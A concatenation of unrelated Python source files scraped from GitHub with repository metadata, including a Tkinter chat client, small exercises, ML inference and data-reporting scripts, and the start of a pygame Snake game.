self.labelHead.place(relwidth = 1)\n self.line = Label(self.Window,\n width = 450,\n bg = \"#ABB2B9\")\n \n self.line.place(relwidth = 1,\n rely = 0.07,\n relheight = 0.012)\n \n self.textCons = Text(self.Window,\n width = 20, \n height = 2,\n bg = \"#17202A\",\n fg = \"#EAECEE\",\n font = \"Helvetica 14\", \n padx = 5,\n pady = 5)\n \n self.textCons.place(relheight = 0.745,\n relwidth = 1, \n rely = 0.08)\n \n self.labelBottom = Label(self.Window,\n bg = \"#ABB2B9\",\n height = 80)\n \n self.labelBottom.place(relwidth = 1,\n rely = 0.825)\n \n self.entryMsg = Entry(self.labelBottom,\n bg = \"#2C3E50\",\n fg = \"#EAECEE\",\n font = \"Helvetica 13\")\n \n # place the given widget\n # into the gui window\n self.entryMsg.place(relwidth = 0.45,\n relheight = 0.06,\n rely = 0.008,\n relx = 0.111)\n def playgame():\n startgame()\n \n self.gamebutton = Button(self.labelBottom,\n text = \"Game\",\n font = \"Helvetica 6 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command =playgame)\n # place the given widget\n # into the gui window\n self.gamebutton.place(relwidth = 0.08,\n relheight = 0.06,\n rely = 0.008,\n relx = 0.011)\n \n self.entryMsg.focus()\n \n def uploading():\n upload()\n self.textCons.config(state = NORMAL),\n self.textCons.insert(END,self.user_name+' is uploading!'+'\\n\\n'), \n self.textCons.config(state = DISABLED)\n self.textCons.see(END)\n self.my_msg=' '+self.user_name+' is uploading!'+'\\n\\n'\n\n \n \n \n def download_for_current_user():\n current_path = str(Path(__file__).parent / 'user_files' / self.user_name)\n download(current_path)\n pdf_processor.main(current_path)\n self.textCons.config(state = NORMAL),\n self.textCons.insert(END,self.user_name+' is downloading!'+'\\n\\n'), \n self.textCons.config(state = DISABLED)\n self.textCons.see(END)\n self.my_msg=' '+self.user_name+' is downloading!'+'\\n\\n'\n\n \n \n # create a Send Button\n self.buttonMsg = Button(self.labelBottom,\n text = \"Send\",\n font = \"Helvetica 10 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command = lambda : self.sendButton(self.entryMsg.get()))\n \n self.buttonMsg.place(relx = 0.77,\n rely = 0.008,\n relheight = 0.024, \n relwidth = 0.22)\n\n self.upload = Button(self.labelBottom,\n text = \"Upload\",\n font = \"Helvetica 6 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command=uploading)\n \n self.upload.place(relx = 0.77,\n rely = 0.038,\n relheight = 0.024, \n relwidth = 0.10)\n self.download = Button(self.labelBottom,\n text = \"Download\",\n font = \"Helvetica 6 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command=download_for_current_user)\n \n self.download.place(relx = 0.88,\n rely = 0.038,\n relheight = 0.024, \n relwidth = 0.10)\n \n self.time = Button(self.labelBottom,\n text = \"Time\",\n font = \"Helvetica 6 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command = lambda : self.showtime())\n \n self.time.place(relx = 0.6,\n rely = 0.008,\n relheight = 0.016, \n relwidth = 0.15)\n \n self.connect = Button(self.labelBottom,\n text = \"Connect\",\n font = \"Helvetica 6 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command = lambda : self.showconnect())\n \n self.connect.place(relx = 0.6,\n rely = 0.026,\n relheight = 0.016, \n relwidth = 0.15)\n \n self.leave = Button(self.labelBottom,\n text = \"Leave\",\n font = \"Helvetica 6 bold\", \n width = 20,\n bg = \"#ABB2B9\",\n command = lambda : self.sendButton('bye'))\n self.leave.place(relx = 0.6,\n rely = 0.044,\n relheight = 0.016, \n relwidth = 0.15)\n \n \n self.textCons.config(cursor = \"arrow\")\n \n # create a scroll bar\n scrollbar = Scrollbar(self.textCons)\n \n # place the scroll bar \n # into the gui window\n scrollbar.place(relheight = 1,\n relx = 0.974)\n \n scrollbar.config(command = self.textCons.yview)\n \n self.textCons.config(state = DISABLED)\n \n # function to basically start the thread for sending messages\n def sendButton(self, msg):\n self.textCons.config(state = DISABLED)\n self.my_msg = msg\n # print(msg)\n self.entryMsg.delete(0, END)\n \n def showtime(self):\n self.textCons.config(state = NORMAL),\n self.textCons.insert(END,'Time: '+time.strftime('%d.%m.%y,%H:%M', time.localtime())+'\\n\\n'), \n self.textCons.config(state = DISABLED)\n self.textCons.see(END)\n \n def showconnect(self):\n if self.entryMsg.get()=='':\n self.my_msg= 'who'\n else:\n target=self.entryMsg.get()\n self.my_msg= 'c '+target\n self.entryMsg.delete(0, END)\n \n def showupload(self):\n self.textCons.config(state = NORMAL),\n self.textCons.insert(END,'uploading!'+'\\n\\n'), \n self.textCons.config(state = DISABLED)\n self.textCons.see(END)\n \n def showdownload(self):\n self.textCons.config(state = NORMAL),\n self.textCons.insert(END,'downloading!'+'\\n\\n'), \n self.textCons.config(state = DISABLED)\n self.textCons.see(END)\n\n def proc(self):\n # print(self.msg)\n while True:\n read, write, error = select.select([self.socket], [], [], 0)\n peer_msg = []\n # print(self.msg)\n if self.socket in read:\n peer_msg = self.recv()\n if len(self.my_msg) > 0 or len(peer_msg) > 0:\n # print(self.system_msg)\n self.system_msg += self.sm.proc(self.my_msg, peer_msg)\n self.my_msg = \"\"\n self.textCons.config(state = NORMAL)\n self.textCons.insert(END, self.system_msg +'\\n\\n') \n self.textCons.config(state = DISABLED)\n self.system_msg=''\n self.textCons.see(END)\n \n \n\n def run(self):\n self.login()\n \n\n# create a GUI class object\nif __name__ == \"__main__\": \n g = GUI()\n","repo_name":"zc2214/ICS_Chat_System","sub_path":"final project/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":13723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"41765283157","text":"def C(j, cost):\n global res\n\n if j == N:\n if res > cost:\n res = cost\n return\n\n if res < cost:\n return\n\n for i in range(N):\n if not visit[i]:\n visit[i] = 1\n C(j+1, cost + board[j][i])\n visit[i] = 0\n\nT = int(input())\nfor t in range(1, T+1):\n N = int(input())\n board = [list(map(int, input().split())) for _ in range(N)]\n visit = [0]*N\n res = 9999999\n\n C(0, 0)\n print('#{} {}'.format(t, res))","repo_name":"Fly-Eugene/algo_study","sub_path":"재식/24sort_swea5209_최소생산.py","file_name":"24sort_swea5209_최소생산.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28646551340","text":"import socket # 导入 socket 模块\nimport argparse\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchvision import datasets, transforms\nfrom PIL import Image\nfrom models import *\n\n\nclass ClientInf:\n\n\n def __init__(self):\n\n rdb = None\n cacheResults = {}\n self.model = None\n self.ServerHost = None\n self.ServerPort = None\n\n\n def loadModel(self):\n self.model = myvgg.myVgg(part=0, st=0, ed=18)\n\n print(self.model)\n # model = myresnet.myResnet18(part=1)\n\n pth = \"../checks/vgg16-397923af.pth\"\n\n checkpoint = torch.load(pth)\n\n self.model.load_state_dict(checkpoint,False)\n return\n\n def getServer(self): #sss\n\n\n\n return\n\n\n\n def getData(self):\n # 加载数据\n dat = datasets.CIFAR10('/Users/huchuanwen/hcw/graduate/rethinking-network-pruning/cifar/l1-norm-pruning/data.cifar10', train=True, download=True,\n transform=transforms.Compose([\n # transforms.Pad(4),\n # transforms.RandomCrop(32),\n # transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n # transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ]))\n img = transforms.ToPILImage(dat.data[0])\n\n img = dat.data[0] # plt.imshow()只能接受3-D Tensor,所以也要用image[0]消去batch那一维\n\n testData = np.transpose(dat.data[0], (2, 0, 1))\n testData = torch.from_numpy(testData).float()\n testData = torch.unsqueeze(testData, dim=0)\n return testData\n\n def getDatas(self, num=10):\n # 加载数据\n\n dats = []\n targets = []\n test_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data.cifar10', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))])),\n batch_size=1, shuffle=True)\n\n cnt = 0\n for data, target in test_loader:\n\n dats.append(data)\n\n targets.append(target)\n\n cnt += 1\n if cnt >= num:\n break\n # data, target = Variable(data, volatile=True), Variable(target)\n\n return dats,targets\n # testData = np.transpose(dat.data[0], (2, 0, 1))\n # testData = torch.from_numpy(testData).float()\n # testData = torch.unsqueeze(testData, dim=0)\n\n\n def inf(self, dat):\n # 装载模型\n\n\n with torch.no_grad():\n # 推理\n\n\n\n model = self.model\n model.eval()\n output = model(dat)\n\n\n\n\n # print(sys.getsizeof(output))\n # print(sys.getsizeof(output.numpy()))\n # print(output.shape)\n pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n # # correct += pred.eq(target.data.view_as(pred)).cpu().sum()\n # print(pred)\n\n return pred\n\n\nif __name__==\"__main__\":\n cli = ClientInf()\n cli.loadModel()\n\n import cv2\n\n camera_index = 0\n cap = cv2.VideoCapture(camera_index)\n ret, frame = cap.read()\n\n\n val_transforms = transforms.Compose([\n transforms.Resize(256),\n transforms.RandomResizedCrop(224),\n transforms.ToTensor(),\n transforms.Normalize((.5, .5, .5), (.5, .5, .5))\n ])\n\n\n img = val_transforms(Image.fromarray(frame))\n\n img = torch.unsqueeze(img, dim=0).float()\n\n index = cli.inf(img)\n\n import json\n\n with open('./imgs/imagenetLabel.json') as f:\n labels = json.load(f)\n\n\n def class_id_to_label(i):\n return labels[i]\n\n print(class_id_to_label(index))\n\n cv2.imshow('frame', frame)\n key2 = cv2.waitKey(0)","repo_name":"hucw999/collaborativeDL","sub_path":"ClientInf.py","file_name":"ClientInf.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"23656337661","text":"# Ստեղծեք Car class-ը, որն ունի հետևյալ attribute-ները՝ model, color և max_speed։\n# Ստեղծեք compareCar(self, car2) մեթոդը, որը ստանում է ևս մեկ Car տիպի object\n# որպես argument ու կվերադարձնում է “car1 is better than car2” եթե ձեր մեքենայի\n# maxSpeed attribute-ի արժեքը մեծ է car2-ի maxSpeed attribute-ի արժեքից և “car2 is\n# better than car1”՝ հակառակ դեպքում։\n# Փորձարկեք class-ի աշխատանքը ստեղծելով այդ class-ի object(ներ)։\n\nclass Car: \n def __init__(self, model, color, max_speed): \n self.model = model\n self.color = color\n self.max_speed = max_speed\n \n def compareCar(self, car2): \n if self.max_speed > car2.max_speed: \n return print(\"car1 is better than car2\")\n else: \n return print(\"car2 is better than car1\")\n\n\ncar1 = Car(\"BMW\", \"black\", 250)\ncar2 = Car(\"Mercedez\", \"white\", 270)\n\ncar1.compareCar(car2)\n","repo_name":"ChessLover/Python1_HW","sub_path":"Week7/Practical/Practical_2.py","file_name":"Practical_2.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"hy","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"11252744966","text":"# pythonpath modification to make hytra and empryonic available \n# for import without requiring it to be installed\nfrom __future__ import print_function, absolute_import, nested_scopes, generators, division, with_statement, unicode_literals\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath('..'))\n# standard imports\nimport logging\nimport configargparse as argparse\nfrom hytra.core.jsongraph import JsonTrackingGraph, writeToFormattedJSON\nfrom hytra.core.jsonmergerresolver import JsonMergerResolver\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Given a hypotheses json graph and a result.json, this script'\n + ' resolves all mergers by updating the segmentation and inserting the appropriate '\n + 'nodes and links.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-c', '--config', is_config_file=True, help='config file path', dest='config_file')\n\n parser.add_argument('--graph-json-file', required=True, type=str, dest='model_filename',\n help='IN Filename of the json model description')\n parser.add_argument('--result-json-file', required=True, type=str, dest='result_filename',\n help='IN Filename of the json file containing results')\n parser.add_argument('--label-image-file', required=True, type=str, dest='label_image_filename',\n help='IN Filename of the original ilasitk tracking project')\n parser.add_argument('--label-image-path', dest='label_image_path', type=str,\n default='/TrackingFeatureExtraction/LabelImage/0000/[[%d, 0, 0, 0, 0], [%d, %d, %d, %d, 1]]',\n help='internal hdf5 path to label image')\n parser.add_argument('--raw-data-file', type=str, dest='raw_filename', default=None,\n help='filename to the raw h5 file')\n parser.add_argument('--raw-data-path', type=str, dest='raw_path', default='volume/data',\n help='Path inside the raw h5 file to the data')\n parser.add_argument(\"--raw-data-axes\", dest='raw_axes', type=str, default='txyzc',\n help=\"axes ordering of the produced raw image, e.g. xyztc.\")\n parser.add_argument('--transition-classifier-file', dest='transition_classifier_filename', type=str,\n default=None, help=\"Transition classifier filename, or None if distance-based energies should be used.\")\n parser.add_argument('--transition-classifier-path', dest='transition_classifier_path', type=str, default='/')\n parser.add_argument('--out-graph-json-file', type=str, dest='out_model_filename', required=True, \n help='Filename of the json model containing the hypotheses graph including new nodes')\n parser.add_argument('--out-label-image-file', type=str, dest='out_label_image', required=True, \n help='Filename where to store the label image with updated segmentation')\n parser.add_argument('--out-result-json-file', type=str, dest='out_result', required=True, \n help='Filename where to store the new result')\n parser.add_argument('--trans-par', dest='trans_par', type=float, default=5.0,\n help='alpha for the transition prior')\n parser.add_argument('--verbose', dest='verbose', action='store_true',\n help='Turn on verbose logging', default=False)\n parser.add_argument('--plugin-paths', dest='pluginPaths', type=str, nargs='+',\n default=[os.path.abspath('../hytra/plugins')],\n help='A list of paths to search for plugins for the tracking pipeline.')\n args, _ = parser.parse_known_args()\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n \n trackingGraph = JsonTrackingGraph(model_filename=args.model_filename, result_filename=args.result_filename)\n\n merger_resolver = JsonMergerResolver(trackingGraph,\n args.label_image_filename,\n args.label_image_path,\n args.out_label_image,\n args.raw_filename,\n args.raw_path,\n args.raw_axes,\n args.pluginPaths,\n args.verbose)\n merger_resolver.run(\n args.transition_classifier_filename,\n args.transition_classifier_path)\n\n # save\n writeToFormattedJSON(args.out_model_filename, merger_resolver.model)\n writeToFormattedJSON(args.out_result, merger_resolver.result)\n","repo_name":"chaubold/hytra","sub_path":"scripts/run_merger_resolving.py","file_name":"run_merger_resolving.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"32635501167","text":"# type: ignore\n# pylint: skip-file\n\nimport os\nimport json\nimport re\nimport argparse\nfrom collections import Counter, defaultdict\nimport pandas as pd\nfrom prettytable import PrettyTable\nfrom joblib import Parallel, delayed, parallel_backend, Memory\n\n# Setup a memory location for caching purposes\nlocation = \"/tmp/joblib_cache\"\nmemory = Memory(location, verbose=0)\n\n# Let's make handle_exception and reading of files an atomic operation using joblib's Memory\n@memory.cache\ndef handle_exception_and_read_file(file):\n with open(file) as f:\n error_log = json.load(f)\n\n try:\n exception = handle_exception(error_log[\"exception\"])\n return exception, error_log\n except KeyError:\n print(f\"Key 'exception' not found in file {file}\")\n print(f\"Contents of the file: {error_log}\")\n return \"exception_key_not_found\", None\n\n\n# Known exception patterns\nexception_patterns = [\n (re.compile(r\"has no attribute\"), \"Numpy_bug\"),\n (re.compile(r\"Unable to allocate\"), \"Memory_error\"),\n (re.compile(r\"There are significant negative eigenvalues\"), \"Neg_eigenvals\"),\n (re.compile(r\"Floating-point under-/overflow occurred at epoch\"), \"under-/overflow\"),\n (re.compile(r\"removed all features!\"), \"Removed_all_features\"),\n (re.compile(r\"Input contains NaN\"), \"NaN\"),\n (re.compile(r\"Bug in scikit-learn\"), \"Scikit-learn_bug\"),\n (re.compile(r\"invalid value encountered in matmul\"), \"Invalid_value_in_matmul\"),\n]\n\n\ndef handle_exception(e):\n for _, (pattern, message) in enumerate(exception_patterns):\n if pattern.search(\n e.replace(\"\\n\", \" \")\n ): # replace line breaks with spaces for pattern search\n return message\n return \"other_exceptions\"\n\n\ndef count_exceptions_and_combinations(dataset_dir):\n error_config_ids = set()\n\n # Initialize empty data structures to count exceptions\n classifiers_counter = defaultdict(lambda: defaultdict(int))\n preprocessors_counter = defaultdict(lambda: defaultdict(int))\n combinations_counter = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))\n dataset_counter = defaultdict(lambda: defaultdict(int))\n\n for root, dirs, files in os.walk(dataset_dir):\n if root == os.path.join(\n dataset_dir, \"errors\"\n ): # Only process files within an 'errors' subdirectory\n for file in files:\n if file.endswith(\".json\"):\n exception, error_log = handle_exception_and_read_file(\n os.path.join(root, file)\n )\n if error_log is None:\n continue\n\n # Identify type of exception\n exception = handle_exception(error_log[\"exception\"])\n\n # Count exceptions for each classifier\n classifier = error_log[\"config\"][\"classifier:__choice__\"]\n classifiers_counter[classifier][exception] += 1\n\n # Count exceptions for each preprocessor\n preprocessor = error_log[\"config\"][\"data_preprocessor:__choice__\"]\n preprocessors_counter[preprocessor][exception] += 1\n\n # Count exceptions for each combination\n combinations_counter[preprocessor][classifier][exception] += 1\n\n # Count exceptions for each dataset\n dataset_counter[os.path.basename(root)][exception] += 1\n\n # Add config_id to the error set\n error_config_ids.add(int(file.split(\".\")[0]))\n\n # Convert nested counters to pandas DataFrame\n df_classifiers = pd.DataFrame(classifiers_counter).transpose()\n df_classifiers[\"Total Count\"] = df_classifiers.sum(axis=1)\n df_classifiers[\"Percentage\"] = (\n df_classifiers[\"Total Count\"] / df_classifiers[\"Total Count\"].sum() * 100\n )\n\n df_preprocessors = pd.DataFrame(preprocessors_counter).transpose()\n df_preprocessors[\"Total Count\"] = df_preprocessors.sum(axis=1)\n df_preprocessors[\"Percentage\"] = (\n df_preprocessors[\"Total Count\"] / df_preprocessors[\"Total Count\"].sum() * 100\n )\n\n df_combinations = pd.concat(\n {\n (preprocessor, classifier): pd.Series(combinations)\n for preprocessor, classifiers in combinations_counter.items()\n for classifier, combinations in classifiers.items()\n },\n names=[\"Preprocessor\", \"Classifier\"],\n )\n df_combinations = df_combinations.unstack(fill_value=0)\n df_combinations[\"Total Count\"] = df_combinations.sum(axis=1)\n df_combinations[\"Percentage\"] = (\n df_combinations[\"Total Count\"] / df_combinations[\"Total Count\"].sum() * 100\n )\n\n # Convert dataset_counter to DataFrame\n df_datasets = pd.DataFrame(dataset_counter).transpose()\n df_datasets[\"Total Count\"] = df_datasets.sum(axis=1)\n for column in df_datasets.columns:\n if column != \"Total Count\":\n df_datasets[f\"{column} Percentage\"] = (\n df_datasets[column] / df_datasets[\"Total Count\"] * 100\n )\n\n return (\n df_combinations,\n df_classifiers,\n df_preprocessors,\n df_datasets,\n error_config_ids,\n )\n\n\ndef calculate_stats_for_dataset(dataset_dir):\n config_dir = os.path.join(dataset_dir, \"configurations\")\n configs = len(os.listdir(config_dir)) if os.path.exists(config_dir) else 0\n configs_percentage = (configs / total_jobs) * 100\n\n labels_dir = os.path.join(dataset_dir, \"labels\")\n labels = len(os.listdir(labels_dir)) if os.path.exists(labels_dir) else 0\n labels_percentage = (labels / configs) * 100 if configs else 0\n\n errors_dir = os.path.join(dataset_dir, \"errors\")\n errors = len(os.listdir(errors_dir)) if os.path.exists(errors_dir) else 0\n errors_percentage = (errors / configs) * 100 if configs else 0\n\n dataset_name = os.path.basename(dataset_dir)\n\n return [\n dataset_name,\n f\"{configs} ({configs_percentage:.2f}%)\",\n f\"{labels} ({labels_percentage:.2f}%)\",\n f\"{errors} ({errors_percentage:.2f}%)\",\n ]\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Process datasets.\")\n parser.add_argument(\n \"--worker_dir\",\n type=str,\n help=\"The root directory to process\",\n default=\"/work/ws/nemo/fr_mj237-pipeline_bench-0/pipeline_bench\",\n )\n parser.add_argument(\n \"--n_jobs\", type=int, help=\"The number of jobs to run in parallel\", default=64\n )\n args = parser.parse_args()\n\n # Total exceptions\n total_exceptions = Counter()\n # Total expected jobs\n total_jobs = 10000\n # Get a list of directories\n root_directory = args.worker_dir\n dirs = sorted(\n (\n d\n for d in os.listdir(root_directory)\n if os.path.isdir(os.path.join(root_directory, d))\n ),\n key=int,\n )\n dataset_dirs = [os.path.join(root_directory, dir) for dir in dirs]\n\n # table = PrettyTable()\n # table.field_names = [\"Dataset\", \"Registered Jobs (Configs)\", \"Successful Jobs (Labels)\", \"Errors\"]\n\n # with parallel_backend('loky', inner_max_num_threads=1):\n # rows = Parallel(n_jobs=args.n_jobs)(delayed(calculate_stats_for_dataset)(dataset_dir) for dataset_dir in dataset_dirs)\n\n # for row in rows:\n # table.add_row(row)\n\n # print(table)\n\n with parallel_backend(\"loky\", inner_max_num_threads=1):\n results = Parallel(n_jobs=args.n_jobs)(\n delayed(count_exceptions_and_combinations)(dataset_dir)\n for dataset_dir in dataset_dirs[:10]\n )\n\n (\n dfs_combinations,\n dfs_classifiers,\n dfs_preprocessors,\n dfs_datasets,\n error_config_ids,\n ) = zip(*results)\n\n dfs_datasets = pd.concat(\n [\n df.assign(Dataset=dataset_dir)\n for df, dataset_dir in zip(dfs_datasets, dataset_dirs[:10])\n ],\n ignore_index=True,\n )\n\n print(\"\\nDatasets:\\n\", dfs_datasets)\n dfs_datasets.to_csv(os.path.join(args.worker_dir, \"datasets_report.csv\"))\n # print(\"Combinations:\\n\", dfs_combinations)\n # print(\"\\nClassifiers:\\n\", dfs_classifiers)\n # print(\"\\nPreprocessors:\\n\", dfs_preprocessors)\n print(\"\\nCommon error config_ids across all datasets:\", sum(len(error_config_ids)))\n\n # Save the dataframes to CSV files\n # dfs_classifiers.to_csv(os.path.join(args.worker_dir, 'classifiers_report.csv'))\n # dfs_preprocessors.to_csv(os.path.join(args.worker_dir, 'preprocessors_report.csv'))\n # dfs_combinations.to_csv(os.path.join(args.worker_dir, 'combinations_report.csv'))\n\n # Save the pretty table to a txt file\n # with open(os.path.join(args.worker_dir, 'table_report.txt'), 'w') as f:\n # f.write(str(table))\n","repo_name":"releaunifreiburg/Pipeline-Bench","sub_path":"pipeline_bench_examples/check_status.py","file_name":"check_status.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72327820033","text":"s=input()\r\n\r\nnum={chr(i) for i in range(47,58)}\r\nlow={chr(i) for i in range(65,91)}\r\nupp={chr(i) for i in range(97,123)}\r\n\r\nn=0\r\nsp=0\r\n\r\nif len(s)<7:\r\n print('Weak')\r\nelse:\r\n for i in s:\r\n if i in num:\r\n n+=1\r\n elif i not in low|upp:\r\n sp+=1\r\n else:\r\n if n>=2 and sp>=2:\r\n print('Strong')\r\n else:\r\n print('Weak')\r\n","repo_name":"deeware/Python_Programs","sub_path":"password_validator.py","file_name":"password_validator.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40098610271","text":"import copy\nfrom typing import List\n\nfrom bson import ObjectId\n\nimport json\n\nfrom main.domain.common.repository import Repository\nfrom main.domain.model.user import User\nfrom main.infrastructure.mongo_service import MongoService\nfrom main.infrastructure.repository.account_repository import AccountRepository\nfrom main.infrastructure.repository.entity_mapper import UserEntityMapper\n\n\nclass UserRepository(Repository):\n\n def __init__(self,\n mongo_service: MongoService,\n account_repo: AccountRepository):\n self.__user_collection = mongo_service.collection(\"users\")\n self.__user_mapper = UserEntityMapper()\n self.__account_repo = account_repo\n\n def list(self) -> List[User]:\n pipeline = [{\n \"$lookup\": {\n \"from\": \"accounts\",\n \"localField\": \"account_ids\",\n \"foreignField\": \"_id\",\n \"as\": \"accounts\"\n }\n }]\n\n dbo_list = self.__user_collection.aggregate(pipeline)\n return [self.__user_mapper.to_domain_model(dbo) for dbo in dbo_list]\n\n def get_user_by_id(self, id: str):\n \"\"\"\n Gets a user by their `id` and returns the user. If no user with `id` is found, then return `None`.\n \"\"\"\n\n pipeline = [\n {\n \"$match\": {\n \"_id\": ObjectId(id)\n }\n },\n {\n \"$lookup\": {\n \"from\": \"accounts\",\n \"localField\": \"account_ids\",\n \"foreignField\": \"_id\",\n \"as\": \"accounts\"\n }\n }\n ]\n\n dbo = next(self.__user_collection.aggregate(pipeline))\n return self.__user_mapper.to_domain_model(dbo)\n\n def save(self, user: User) -> User:\n dbo = self.__user_mapper.from_domain_model(user)\n\n # Save all accounts to the DB\n [self.__account_repo.save(account) for account in user.accounts]\n\n if user.id:\n result = self.__user_collection.update_one({'_id': ObjectId(user.id)}, {'$set': dbo}, upsert=True)\n return user\n\n # If no user ID exists\n else:\n result = self.__user_collection.insert_one(dbo)\n\n # Copying to prevent modifying the previous user object\n new_user = copy.deepcopy(user)\n new_user.id = result.inserted_id\n return new_user\n","repo_name":"Ray-F/consolidate","sub_path":"server/main/infrastructure/repository/user_repository.py","file_name":"user_repository.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"18766953373","text":"from mcdreforged.api.all import *\n\nfrom mcdr_bot_manager.text import WORLD_NAME\n\n\nclass Botinfo:\n\n def __init__(self,\n name: str,\n info: str = '临时加载',\n pos: tuple[int, int, int] = [0, -1, 0],\n facing: tuple[int, int] = [-1, 0],\n world: int = -1):\n self.name = name\n self.info = info\n self.pos = pos\n self.facing = facing\n self.world = int(world)\n\n\nclass Bot:\n\n def __init__(self, server: PluginServerInterface, info: Info, Botinfo: Botinfo, qtype=False):\n self.info = Botinfo\n self.qtype = qtype\n #spawm\n if info is not None and info.is_player:\n cmd = f'execute at {info.player} run player bot_{self.info.name} spawn{self.spawn_argument()}'\n else:\n cmd = f'player bot_{self.info.name} spawn{self.spawn_argument()}'\n server.execute(cmd)\n\n def kill(self, server: PluginServerInterface):\n server.execute(f'player bot_{self.info.name} kill')\n\n def spawn_argument(self) -> str:\n temp_command: str = ''\n if self.info.pos[1] == -1:\n return temp_command\n temp_command += f' at {self.info.pos[0]} {self.info.pos[1]} {self.info.pos[2]}'\n if self.info.facing[0] == -1:\n return temp_command\n temp_command += f' facing {self.info.facing[0]} {self.info.facing[1]}'\n if self.info.world == -1:\n return temp_command\n temp_command += f' in {WORLD_NAME[int(self.info.world)]}'\n return temp_command\n","repo_name":"mccube2000/MCDR-Bot-manager","sub_path":"mcdr_bot_manager/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"71619619073","text":"from app.tests import BaseTestClass\nfrom app.models import Store\n\n\nclass SetupApiTestCase(BaseTestClass):\n\n def test_setup_endpoint(self):\n with self.app.app_context():\n stores = Store.query.all()\n self.assertEqual(0, len(stores))\n res = self.client.get('/setup', follow_redirects=True)\n self.assertEqual(201, res.status_code)\n stores = Store.query.all()\n self.assertEqual(3, len(stores))\n","repo_name":"AlarconZQL/MinimartAPI","sub_path":"app/tests/test_setup_api.py","file_name":"test_setup_api.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40799037843","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Snake - v2.1\n# Ce script est un programme du jeu snake\n# License libre CC BY 4.0\n# Colin Laganier - Thomas Le Menestrel - 2018.05.13\n\n#Importation des bibliothèques nécessaires\nfrom pygame.locals import *\nfrom random import randint\nimport pygame\nimport time\n\n#Définition des variables intervenant dans le jeu\nx = [0]\ny = [0]\nstep = 23\nscore = 0\nhighscore = 0\nlength = 3\netat = 1\nmenu = 1\nsize_barre = 70\nvitesse = 75.0\n\n#Création d'un grand nombre de rangs au sein de la liste pour éventuellement agrandir le corps du serpent jusqu'à 1000 sections\nfor i in range(0,1000):\n x.append(-100)\n y.append(-100)\n\n#Fonction définissant si il y a une collision entre les coordonnées du serpent et d'autres coordonnées, comme celles des fruits ou des différentes parties du serpent\ndef collision(x1,y1,x2,y2, size_snake, size_fruit):\n if ((x1 + size_snake >= x2) or (x1 >= x2)) and x1 <= x2 + size_fruit:\n if ((y1 >= y2) or (y1 + size_snake >=y2)) and y1 <= y2 + size_fruit:\n return True\n return False\n\n#Fonction qui affiche le score du joueur sur la page de jeu\ndef disp_score(score):\n font = pygame.font.SysFont(None, 25)\n text = font.render(\"Score: \"+str(score), True, (0, 0, 0))\n fenetre.blit(text,(400,0))\n\n#Fonction qui centre le texte donnée entre deux coordonnées\ndef disp_text(info,x,y):\n font18 = pygame.font.SysFont(None, 18)\n text = font18.render((info),True,(0,0,0))\n textX = text.get_rect().width\n textY = text.get_rect().height\n fenetre.blit(text,((x - (textX / 2)),(y - (textY / 2))))\n\n#Initialisation de la bibliothèques Pygame\npygame.init()\n\n#Chargement des bruitages du jeu\nbruit_mouvement = pygame.mixer.Sound(\"move.wav\")\nbruit_collision = pygame.mixer.Sound(\"collision.wav\")\n\n#Création de la fenêtre\nfenetre = pygame.display.set_mode((500, 500))\nfenetre_rect = fenetre.get_rect()\n\n#La fenêtre de jeu est nommée\npygame.display.set_caption(\"Snake\")\n\n#Chargement d'un fond blanc avec lequel la fenêtre est remplie\ncouverture = pygame.Surface(fenetre.get_size())\ncouverture = couverture.convert()\ncouverture.fill((250, 250, 250))\nfenetre.blit(couverture, (0,0))\n\n#Chargement des images des différents objets du jeu\nhead = pygame.image.load(\"head.png\").convert_alpha() # La tête\nhead = pygame.transform.scale(head, (35,35))\ncorps1 = pygame.image.load(\"corps.png\").convert_alpha() #Le corps\ncorps1 = pygame.transform.scale(corps1, (25,25))\nfruit = 